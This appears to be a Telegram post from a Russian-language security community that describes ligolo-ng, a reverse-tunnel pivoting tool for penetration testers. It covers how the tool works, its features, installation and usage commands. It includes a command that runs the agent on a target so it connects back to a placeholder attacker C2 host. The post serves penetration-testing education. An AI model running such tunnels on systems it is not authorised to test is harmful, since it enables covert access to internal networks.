Codeby
36.3K subscribers
2.09K photos
98 videos
12 files
7.87K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy

CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
🔁 ligolo-ng

Простой, легкий и быстрый инструмент, который позволяет пентестерам создавать туннели на основе обратного TCP/TLS-соединения с использованием интерфейса tun (без необходимости в SOCKS). Поддерживаются протоколы TCP, UDP, ICMP.


👉 Принцип работы
Пакеты, отправляемые в TUN-интерфейс при запуске прокси-сервера, транслируются и затем передаются в удалённую сеть агента.

Например, для TCP-соединения процесс работает следующим образом:
⏺️SYN-пакеты преобразуются в системный вызов connect() на удалённой стороне.
⏺️Если connect() выполняется успешно, обратно отправляется SYN-ACK.
⏺️Если после вызова connect() возвращаются ошибки ECONNRESET, ECONNABORTED или ECONNREFUSED, отправляется RST-пакет.
⏺️Если соединение завершается тайм-аутом, никакого ответа не отправляется.

Такой механизм позволяет использовать инструменты, например Nmap, без необходимости использования proxychains.

📐Характеристики
📉Удобный пользовательский интерфейс с возможностью выбора агента и отображением информации о сетевых соединениях;
📉Автоматическая настройка сертификата с использованием Let's Encrypt;
📉Агент не требует повышенных привилегий на целевой системе;
📉Поддержка одновременной работы с несколькими туннелями;
📉Поддержка WebSocket-соединений;
📉Поддержка режимов reverse-подключения и bind-подключения.

🔎 Установка
Можно произвести установку из репозитория Kali Linux : apt install ligolo-ng.
Или собрать через go:
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go


➡️Использование
При использовании в Linux необходимо создать интерфейс tun на прокси-сервере:
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up


Далее необходимо запустить прокси-сервер на своем сервере (порт по умолчанию 11601):
./proxy -autocert 
./proxy -selfcert


После этого запускается агент на целевой системе:
./agent -connect attacker_c2_server.com:11601


После подключения агента на прокси-сервере появится новая сессия:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000


Через команду session необходимо выбрать нужного агента и далее запустить туннелирование на прокси-сервере, используя имя интерфейса.

❗️С версии 0.8 в инструменте поддерживается управление через веб-интерфейс.

#tools #tun #pentest #network

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
12👍8🔥6